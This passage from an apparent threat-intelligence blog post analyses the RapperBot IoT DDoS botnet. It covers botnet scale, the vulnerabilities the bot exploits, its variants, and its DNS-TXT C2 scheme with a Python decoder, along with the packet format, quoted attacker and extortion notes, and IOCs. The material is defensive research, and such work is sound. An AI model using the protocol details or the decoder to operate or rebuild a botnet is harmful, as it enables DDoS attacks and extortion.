<p>The Pastebin URL in the image, <a href="https://pastebin.com/dfHYSqVz?ref=blog.xlab.qianxin.com">https://pastebin.com/dfHYSqVz</a>, contains the following content after Base64 decoding:</p>
<pre><code>This is rapperbot, rapperbot is in its testing and development stages. Take nothing here seriously.
Brian Krebs approves of this project; he is our number one supporter.
FUCK DOTA3.TAR.GZ (outlaw) AND FUCK xorddos for using those dumb ass low IQ root kits. (they have no idea what&apos;s to come)
I love Olivia Rodrigo, soon I will be rich enough to meet her.

Question, Did you guys listen to my music whilst reverse engineering my binary? (https://www.youtube.com/watch?v=4fm_ZZn5qaw)
I can only imagine the Chinese (NETLAB360) researchers not understanding it at all and trying to decode the meaning behind it.

Anyway, 2tall out!
See you guys in the next update, I&apos;ll most likely leave another note.
</code></pre>
<p>In recent samples, we noticed that RapperBot seems to have started extorting victims, demanding &quot;protection fees&quot; to avoid DDoS attacks.</p>
<pre><code>Donate $5,000 in XMR to (48SFiWgbAaFf75KsRSEEr4iDcxrevFzVmhgfb6Qudss52JK8cCR8bwmUxNBPN2VmqDTucJL3eabiZc5XRYVGkbh6BH58Ytk) to be blacklisted from this and future botnets from us. Contact: horse@riseup.net with TxID and IP Range/ASN.
</code></pre>
<p>XLAB has been tracking this family for a long time, and we will share some of our latest findings with the community below.</p>
<h1 id="bot-scale">Bot Scale</h1>
<p>When analyzing RapperBot samples, we found that some of the 32 C2 domains it generated had not yet been registered. On April 3, 2024, we proactively registered several of these unused C2 domains. By statistics and analysis of bot hosts (BOTs) accessing our registered domains, we can indirectly obtain information about the RapperBot botnet&apos;s scale, distribution, and other details.</p>
<p>In the most recent month of observation, the peak number of BOT IP addresses reached over 50,000, and the BOT activity trend is as follows:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/05/sinkhole_1mon-2.png" alt="sinkhole_1mon.png" loading="lazy"></p>
<h3 id="bot-group-information">BOT Group Information</h3>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/05/wordart.png" alt="wordart.png" loading="lazy"></p>
<h3 id="bot-infected-region-distribution">BOT Infected Region Distribution</h3>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/06/rapperbot.geo.png" alt="rapperbot.geo.png" loading="lazy"></p>
<h3 id="infected-devices">Infected Devices</h3>
<p>According to data analysis from XLAB&apos;s HUNTER system, RapperBot malware currently primarily infects IoT devices with public network access capabilities, especially network cameras, and home and enterprise-level routers. These devices usually have default weak passwords or firmware vulnerabilities, making them easy targets for attackers. According to statistics, the top WEB interface titles (Web Titles) of infected devices are as follows:</p>
<table>
<thead>
<tr>
<th>WEB Title</th>
<th>Application</th>
</tr>
</thead>
<tbody>
<tr>
<td>DVR Components Download</td>
<td>DVR/NVR/Camera</td>
</tr>
<tr>
<td>Network Surveillance</td>
<td>DVR/NVR/Camera</td>
</tr>
<tr>
<td>NETSurveillance WEB</td>
<td>DVR/NVR/Camera</td>
</tr>
<tr>
<td>WEB SERVICE</td>
<td>DVR/NVR/Camera</td>
</tr>
<tr>
<td>ASUS Login</td>
<td>Router</td>
</tr>
<tr>
<td>AXIS</td>
<td>DVR/NVR/Camera</td>
</tr>
<tr>
<td>RouterOS router configuration page</td>
<td>Router</td>
</tr>
</tbody>
</table>
<h1 id="ddos-attack-targets">DDoS Attack Targets</h1>
<p>RapperBot&apos;s attack targets span various industries, including public administration, social security and social organizations, internet platforms, manufacturing, and financial services. From a geographical distribution perspective, China has the largest number of targets. It has also attacked other important platforms during hot periods, such as: <a href="https://www.globaltimes.cn/page/202503/1329902.shtml?ref=blog.xlab.qianxin.com">attacking the well-known AI platform DeepSeek during the Spring Festival</a>, and <a href="https://www.globaltimes.cn/page/202503/1329902.shtml?ref=blog.xlab.qianxin.com">attacking the social media platform Twitter in mid-March</a>.</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/06/rapperbot.ccm.png" alt="rapperbot.ccm.png" loading="lazy"></p>
<h1 id="sample-propagation">Sample Propagation</h1>
<p>Based on our data observations, RapperBot primarily spreads through Telnet weak passwords and by exploiting known vulnerabilities. Currently, the main vulnerabilities it exploits include but are not limited to the following:</p>
<table>
<thead>
<tr>
<th>VULNERABILITY</th>
<th>AFFECTED</th>
</tr>
</thead>
<tbody>
<tr>
<td>TELNET_Weak_Password</td>
<td></td>
</tr>
<tr>
<td><a href="https://blog.netlab.360.com/mirai_ptea-botnet-is-exploiting-undisclosed-kguard-dvr-vulnerability-en?ref=blog.xlab.qianxin.com">KGUARD DVR TCP_MSGHEAD_CMD</a></td>
<td>KGUARD DVR</td>
</tr>
<tr>
<td>CNVD-2021-79445</td>
<td>Ruijie NBR700</td>
</tr>
<tr>
<td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-46229?ref=blog.xlab.qianxin.com">CVE-2021-46229</a></td>
<td>D-Link Di-7200G</td>
</tr>
<tr>
<td><a href="https://bugprove.com/knowledge-hub/cve-2023-4473-and-cve-2023-4474-authentication-bypass-and-multiple-blind-os-command-injection-vulnerabilities-in-zyxel-s-nas-326-devices/?ref=blog.xlab.qianxin.com">CVE-2023-4473</a></td>
<td>Zyxel NAS326</td>
</tr>
<tr>
<td><a href="https://github.com/thirtythreeforty/neolink?ref=blog.xlab.qianxin.com">Reolink BaiChuan RCE</a></td>
<td>Neolink</td>
</tr>
<tr>
<td><a href="https://github.com/lctseng/2014-Meichu-Hackathon-Team-Soloq/blob/master/General.rb?ref=blog.xlab.qianxin.com">CVE-2020-9054</a></td>
<td>ZyXEL NAS</td>
</tr>
<tr>
<td><a href="https://github.com/mcw0/PoC/blob/master/TVT-PoC.py?ref=blog.xlab.qianxin.com">Shenzhen TVT</a></td>
<td>Shenzhen TVT DVR</td>
</tr>
<tr>
<td><a href="https://www.exploit-db.com/exploits/39596/?ref=blog.xlab.qianxin.com">CCTV-DV</a></td>
<td>Multiple Vendors CCTV-DVR</td>
</tr>
<tr>
<td><a href="https://www.google.com/search?q=https%3A%2F%2Fgithub.com%2Ftzwlhack%2FVulnerability%2Fblob%2Fmain%2FD-link%2520DSL-2888A%2520%25E8%25BF%259C%25E7%25A8%258B%25E4%25BB%25A3%25E7%25A0%2581%25E6%2589%25A7%25E8%25A1%258C%25E6%25BC%25A9%25E6%25B4%259E%2520%28CVE-2020-24581%29.md&amp;ref=blog.xlab.qianxin.com">CVE-2020-24581</a></td>
<td>D-link DSL-2888A</td>
</tr>
<tr>
<td><a href="https://blog.netlab.360.com/multiple-botnets-are-spreading-using-lilin-dvr-0-day/?ref=blog.xlab.qianxin.com">LILIN DVR</a></td>
<td>LILIN DVR</td>
</tr>
</tbody>
</table>
<h1 id="sample-analysis">Sample Analysis</h1>
<p>Through tracking samples of this family, we found that the developer updates the samples every few months and enters an active state. Over more than a year, we have captured <strong>7 variants</strong> of this family:</p>
<table>
<thead>
<tr>
<th>time</th>
<th>sha1</th>
<th>ps</th>
<th>decrypt method</th>
<th>login length</th>
</tr>
</thead>
<tbody>
<tr>
<td>2023-07-21</td>
<td>8a9a098dabcc09c8a770777f12c71017bb26940b</td>
<td>listening tun0</td>
<td>mirai string decryption, fixed key (0xDEADBEEF)</td>
<td>36</td>
</tr>
<tr>
<td>2023-10-15</td>
<td>d4bca8193b808dcdbdb79367ac688f6f424da36f</td>
<td>listening tun0</td>
<td>rapperbot custom string decryption</td>
<td>171</td>
</tr>
<tr>
<td>2023-12-27</td>
<td>a742f069f604aa302dbfe6ccf0bc481726e76fb6</td>
<td>listening tun0</td>
<td>rapperbot custom string decryption</td>
<td>114</td>
</tr>
<tr>
<td>2024-03-10</td>
<td>09dc5f47374410bb05cfd72bc1fa6523a35ec6dc</td>
<td>listening tun0</td>
<td>mirai string decryption, multiple decryption keys</td>
<td>60</td>
</tr>
<tr>
<td>2024-06-14</td>
<td>bc21342317fca22076406873013959ed111cf8dc</td>
<td>Firmware update in progress</td>
<td>mirai string decryption, multiple decryption keys</td>
<td>90</td>
</tr>
<tr>
<td>2024-10-10</td>
<td>cc687e707919c4176ab03bdc76ab01bbaa7c0e22</td>
<td>Firmware update in progress</td>
<td>mirai string decryption, multiple decryption keys</td>
<td>120</td>
</tr>
<tr>
<td>2025-03-30</td>
<td>4a0aa2b7f357164dbd49c0c6ab71a3c73e148aaa</td>
<td>Firmware update in progress</td>
<td>rapperbot custom string decryption</td>
<td>120</td>
</tr>
</tbody>
</table>
<p>Samples of different variants within this family are largely similar, with modifications mainly focused on message data structures, DNS-TXT record parsing methods, and string decoding. Functionally, they are primarily used for DDoS attacks, with proxy capabilities added starting from October 2024.</p>
<h2 id="c2-acquisition">C2 Acquisition</h2>
<p>Unlike most botnets, RapperBot resolves its C2 domain through DNS-TXT records. So far, we have identified four different TXT record formats:</p>
<table>
<thead>
<tr>
<th>time period</th>
<th>TXT record format</th>
</tr>
</thead>
<tbody>
<tr>
<td>2023.07 - 2024.04</td>
<td>IP,IP,IP</td>
</tr>
<tr>
<td>2024.06 - 2024.10</td>
<td>&lt;IP&gt;&lt;IP&gt;&lt;IP&gt;</td>
</tr>
<tr>
<td>2024.10 - 2025.03</td>
<td>IP</td>
</tr>
<tr>
<td>2025.03 - now</td>
<td>EncryptedString</td>
</tr>
</tbody>
</table>
<p>Regarding C2 ports, early versions used fixed ports such as 1111, 1024, and 9999. In the latest samples, however, a random port is selected from a pool of 35 possible options&#xFF1A;</p>
<pre><code>443, 4443, 993, 995, 25565, 1935, 3478, 27015, 7777, 3724, 5222, 7000, 5223, 4444, 3074, 27014, 27050, 3544, 6666, 2222, 22022, 2022, 19153, 3389, 37777, 6036, 34567, 5000, 10554, 554, 18004, 9000, 35000, 10001, 9001
</code></pre>
<h2 id="encryption-and-decryption-algorithms">Encryption and Decryption Algorithms</h2>
<h3 id="string-decryption-algorithm">String Decryption Algorithm</h3>
<p>RapperBot has used three encryption algorithms. Early versions used the same algorithm as Mirai, followed by the development of unique custom decryption algorithms and an enhanced version of the Mirai decryption algorithm, which are rotated across multiple variants:</p>
<ol>
<li><strong>Improved Mirai source code string decryption method</strong>, adding different 4-byte decryption keys for each string and continuing to use Mirai&apos;s decryption function.</li>
</ol>
<p><img src="https://blog.xlab.qianxin.com/content/images/2024/10/strinit.PNG" alt="strinit.PNG" loading="lazy"></p>
<ol start="2">
<li><strong>Custom decryption method</strong>, using a variable-length key that is encrypted twice before being applied. The data is then decrypted using multi-byte XOR with the processed key.</li>
</ol>
<p><img src="https://blog.xlab.qianxin.com/content/images/2024/10/rapperbot_old_strdecode.png" alt="rapperbot_old_strdecode.png" loading="lazy"></p>
<h3 id="c2dns-txt-decryption-algorithm">C2/DNS-TXT Decryption Algorithm</h3>
<p>Starting from March 2025, RapperBot uses a <strong>custom decryption algorithm</strong> to decrypt TXT records and C2 domains:<br>
By decrypting the string table, we can obtain 3 strings:</p>
<table>
<thead>
<tr>
<th>str</th>
<th>desc</th>
</tr>
</thead>
<tbody>
<tr>
<td>ipWPeY43MhfFBt8ZCSN2KTdD6nEkmGjwx7vJR5rogzbcqHsXUQuyVA9L</td>
<td>Table used for decryption algorithm</td>
</tr>
<tr>
<td>WF6i6VEcfjnyqtGKxism65YwRE9VYzzzbtLgLD4tWEsnZLgbJfuE94qtvTqGgVG3ScFtsfcxqTNtYKRWQTqNBqp6VLMv2p</td>
<td>Encrypted second-level domain list</td>
</tr>
<tr>
<td>WMKFVCnSHDrC89fvKgCShwmRjEx8</td>
<td>Encrypted third-level domain list</td>
</tr>
</tbody>
</table>
<p>The top-level domain string is not written to the string table but is written to a global variable via the stack:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/05/tlds_data.png" alt="tlds_data.png" loading="lazy"></p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/05/tlds_stack_asm.png" alt="tlds_stack_asm.png" loading="lazy"></p>
<p>After decryption with the unique algorithm, the parts of the C2 domain can be obtained. The decryption algorithm and results are as follows:</p>
<pre><code class="language-python">def decodeTXT(data:str):
    key = &quot;ipWPeY43MhfFBt8ZCSN2KTdD6nEkmGjwx7vJR5rogzbcqHsXUQuyVA9L&quot;
    a = key.find(data[0])
    b = key.find(data[1])
    seed = 56*a+b
    magic = 1000000000 + 0x62B846D
    S = bytearray(range(56))
    T = bytearray(56)
    tseed = seed
    for i in range(55, 0, -1):
        tseed = (magic * tseed + 0x3039)&amp;0xffffffff
        index = tseed%(i+1)
        S[i], S[index] = S[index], S[i]
    for i in range(56):
        T[S[i]] = i
    res = bytearray()
    for i in data[2:]:
        index = (T[key.find(i)] - (len(data)-2) - seed)%56
        res.append(index)
    length = ceil(len(res) * log2(56) / 8)
    res3 = bytearray(length)
    for t1 in res:
        carry = t1
        for i in reversed(range(len(res3))):
            temp = res3[i] * 56 + carry
            res3[i] = temp &amp; 0xFF
            carry = temp &gt;&gt; 8

    while len(res3) &gt; 0 and res3[0] == 0:
        del res3[0]
    return res3 if len(res3) &gt; 0 else bytearray(b&apos;\x00&apos;)
</code></pre>
<pre><code>Third-level domains: KDXA|EICp|kHbW|YFrV
Second-level domains: ByxWGIMPbwiSkniw|gwYhHCOrybwjWuzh|GaihWstPZUoMtfnU|zkUAFIMFDwVETXJQ
Top-level domains: info|live
</code></pre>
<p>Using &quot;|&quot; to split each part of the domain will eventually generate <strong>32 C2 domains</strong>, and one will be randomly selected for DNS-TXT resolution. The TXT record string is decrypted using the same decryption algorithm:</p>
<pre><code>TXT record: i7do6u4FtLeeMjmnwWczxKJmtoRRvgCCqiinWW9EUtVpLx38db5xrCfr8mHmsxmutZ4C8fXL2jhGVzfdUQmvvnzZW7pCJmUpi

Decrypted: 5.230.39.10|5.230.68.153|82.24.200.59|82.24.200.68|62.146.235.220|5.230.227.190|5.230.227.191|5.230.227.237|5.230.227.238
</code></pre>
<h2 id="network-protocol">Network Protocol</h2>
<p>RapperBot&#x2019;s network protocol is relatively simple, with no key exchange or complex encryption involved; The payload is only XORed with a single byte (using a variable key); Across multiple variants, only the check-in information and message encoding have been modified.</p>
<h3 id="register">Register</h3>
<p>RapperBot&apos;s login packet format differs across versions, sometimes adding fields, sometimes reducing them, but always including <strong>hostname, source, stunIP, and localIP</strong>, and filling unused space with non-zero random numbers. The latest version adds network information fields, with a total size of 120. Below is a description of the relevant structure:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2024/10/login.png" alt="login.png" loading="lazy"></p>
<h3 id="message-encoding">Message Encoding</h3>
<p>In terms of network communication, different versions of message formats have slight differences, but they usually consist of 3 parts: <strong>Header, Payload, and RandData</strong>. Taking the latest sample as an example, the Header adds a checksum field, and RandData is randomly generated from the string table <code>q1x4fyntb3i0umw2gzcr9a5jkv7o8pl6eohds</code>:</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2024/10/packet.png" alt="packet.png" loading="lazy"></p>
<p>Message structure:</p>
<pre><code class="language-c">struct rapperbot_packet{
	int32 total_size;
	int32 payload_size;
	int16 checkcode;
	int8 xorkey;
	int8 packet_type;
	int8 payload[payload_size];
	int8 randdata[total_size-payload_size];
};
</code></pre>
<p>Known message types and their functions:</p>
<table>
<thead>
<tr>
<th>PacketType</th>
<th>Desc</th>
</tr>
</thead>
<tbody>
<tr>
<td>1</td>
<td>Login</td>
</tr>
<tr>
<td>2</td>
<td>Confirm</td>
</tr>
<tr>
<td>3</td>
<td>Pong</td>
</tr>
<tr>
<td>4</td>
<td>HeartBeat</td>
</tr>
<tr>
<td>5</td>
<td>Start Attack</td>
</tr>
<tr>
<td>6</td>
<td>Stop Attack</td>
</tr>
<tr>
<td>9</td>
<td>Proxy Enable</td>
</tr>
<tr>
<td>10</td>
<td>Proxy Disable</td>
</tr>
<tr>
<td>11</td>
<td>Proxy Create</td>
</tr>
<tr>
<td>12</td>
<td>Proxy Start</td>
</tr>
<tr>
<td>13</td>
<td>Proxy Close</td>
</tr>
</tbody>
</table>
<h1 id="contact-us">Contact Us</h1>
<p>Readers are always welcomed to reach us on <a href="https://twitter.com/Xlab_qax?ref=blog.xlab.qianxin.com">twitter</a>.</p>
<h1 id="ioc">IOC</h1>
<pre><code>XMR wallet address:
48SFiWgbAaFf75KsRSEEr4iDcxrevFzVmhgfb6Qudss52JK8cCR8bwmUxNBPN2VmqDTucJL3eabiZc5XRYVGkbh6BH58Ytk

C2 Domain:
iranistrash.libre
churchofhollywood.libre
iguessimhere.libre

KDXA.ByxWGIMPbwiSkniw.info
KDXA.ByxWGIMPbwiSkniw.live
KDXA.gwYhHCOrybwjWuzh.info
KDXA.gwYhHCOrybwjWuzh.live
KDXA.GaihWstPZUoMtfnU.info
KDXA.GaihWstPZUoMtfnU.live
KDXA.zkUAFIMFDwVETXJQ.info
KDXA.zkUAFIMFDwVETXJQ.live
EICp.ByxWGIMPbwiSkniw.info
EICp.ByxWGIMPbwiSkniw.live
EICp.gwYhHCOrybwjWuzh.info
EICp.gwYhHCOrybwjWuzh.live
EICp.GaihWstPZUoMtfnU.info
EICp.GaihWstPZUoMtfnU.live
EICp.zkUAFIMFDwVETXJQ.info
EICp.zkUAFIMFDwVETXJQ.live
kHbW.ByxWGIMPbwiSkniw.info
kHbW.ByxWGIMPbwiSkniw.live
kHbW.gwYhHCOrybwjWuzh.info
kHbW.gwYhHCOrybwjWuzh.live
kHbW.GaihWstPZUoMtfnU.info
kHbW.GaihWstPZUoMtfnU.live
kHbW.zkUAFIMFDwVETXJQ.info
kHbW.zkUAFIMFDwVETXJQ.live
YFrV.ByxWGIMPbwiSkniw.info
YFrV.ByxWGIMPbwiSkniw.live
YFrV.gwYhHCOrybwjWuzh.info
YFrV.gwYhHCOrybwjWuzh.live
YFrV.GaihWstPZUoMtfnU.info
YFrV.GaihWstPZUoMtfnU.live
YFrV.zkUAFIMFDwVETXJQ.info
YFrV.zkUAFIMFDwVETXJQ.live



Download Domain:
pool.rentcheapcars.sbs
o0s.cc
4v.wtf
zyb.ac

Hardcode backup C2:
86.104.72.130	Canada|Ontario|Toronto	AS208913|Mouk, LLC
194.156.98.15	China|Hongkong|Hongkong	AS44477|STARK INDUSTRIES SOLUTIONS LTD
94.131.118.154	France|Ile-de-France|Paris	AS44477|STARK INDUSTRIES SOLUTIONS LTD
5.231.3.32	Germany|Hessen|Frankfurt am Main	AS12586|GHOSTnet GmbH
5.231.4.35	Germany|Hessen|Frankfurt am Main	AS12586|GHOSTnet GmbH
185.248.144.209	Italy|Lazio|Rome	AS44477|STARK INDUSTRIES SOLUTIONS LTD
45.150.65.202	United States|New Jersey|Secaucus	AS44477|STARK INDUSTRIES SOLUTIONS LTD

</code></pre>
]]></content:encoded></item></channel></rss>